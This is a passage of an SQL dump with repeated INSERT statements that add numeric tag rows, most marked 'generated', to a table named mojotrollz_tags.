1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15091, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15091, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15101, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15102, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15102, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15103, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15103, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15104, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15105, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15105, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15106, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15106, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15107, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15108, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15109, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15110, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15111, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15111, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15111, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15112, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15113, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15113, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15114, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15115, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15115, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15116, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15118, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15119, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15122, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15124, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15124, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15125, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15125, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15126, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15126, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15127, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15127, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15128, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15128, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15130, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15130, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15131, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15131, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15136, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15137, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15138, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15139, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15140, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15141, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15146, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15162, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15162, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15163, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15164, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15164, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15165, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15165, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15168, 1, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15168, 1, 2, 3429, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15168, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15169, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15169, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15170, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15170, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15171, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15171, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15172, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15172, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15174, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15174, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15175, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15175, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15176, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15176, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15177, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15177, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15178, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15178, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15179, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15179, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15180, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15180, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15181, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15181, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15182, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15182, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15183, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15183, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15184, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15184, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15185, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15185, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15186, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15186, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15186, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15186, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15186, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15186, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15187, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15187, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15188, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15188, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15188, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15188, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15188, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15188, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15189, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15189, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15190, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15190, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15191, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15191, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15192, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15192, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15193, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15194, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15194, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15195, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15196, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15196, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15197, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15199, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15200, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15200, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15201, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15201, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15202, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15202, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15203, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15204, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15205, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15206, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15207, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15208, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15209, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15211, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15212, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15213, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15213, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15214, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15214, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15215, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15215, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15216, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15217, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15218, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15220, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15221, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15221, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15222, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15222, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15224, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15229, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15229, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15229, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15230, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15230, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15230, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15233, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15233, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15233, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15235, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15235, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15235, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15236, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15236, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15236, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15240, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15240, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15240, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15246, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15246, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15246, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15247, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15247, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15247, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15249, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15249, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15249, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15250, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15250, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15250, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15252, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15252, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15252, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15260, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15261, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15262, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15262, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15262, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15263, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15263, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15263, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15264, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15264, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15264, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15270, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15270, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15275, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15275, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15275, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15276, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15276, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15276, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15277, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15277, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15277, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15282, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15282, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15286, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15288, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15290, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15293, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15293, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15299, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15299, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15299, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15300, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15300, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15300, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15302, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15303, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15303, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15304, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15305, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15306, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15306, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15307, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15308, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15308, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15309, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15309, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15309, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15309, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15309, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15309, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, 